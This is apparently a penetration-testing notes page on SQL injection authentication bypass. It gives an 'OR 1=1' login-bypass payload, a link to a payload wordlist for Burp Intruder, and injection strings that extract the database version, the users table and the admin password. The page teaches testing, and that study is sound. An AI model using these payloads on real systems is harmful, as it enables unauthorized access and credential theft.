Authentication Bypass

When a login form is present, an authentication bypass may occur due to improper sanitization of user input before processing. If a lockdown policy is not enforced for login, you can use the payload below to test its efficacy with the Burp Suite Intruder tool.

https://gist.githubusercontent.com/spenkk/2cd2f7eeb9cac92dd550855e522c558f/raw/5143174f3e847ae76a80d7a300a5ef954bc51a79/sqli-auth-bypass.txtgist.githubusercontent.com

One of the example:

offsec' OR 1=1 -- //

By forcing the closing quote on the username value and adding the statement `OR 1=1`, followed by a comment separator (two consecutive dashes followed by at least one whitespace character), we can prematurely terminate the SQL statement. The inclusion of two forward slashes (//) serves as additional protection for our payload against any potential whitespace truncation that the web application might implement.

Running command

If there is SQLi present we can enumerate the database by running command.

Not all commands can be executed this way.

Below are some examples:

' or 1=1 in (select @@version) -- //

' OR 1=1 in (SELECT * FROM users) -- //

' or 1=1 in (SELECT password FROM users) -- //

' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

PreviousMSSQL NextUnion Based SQLi

Last updated 11 months ago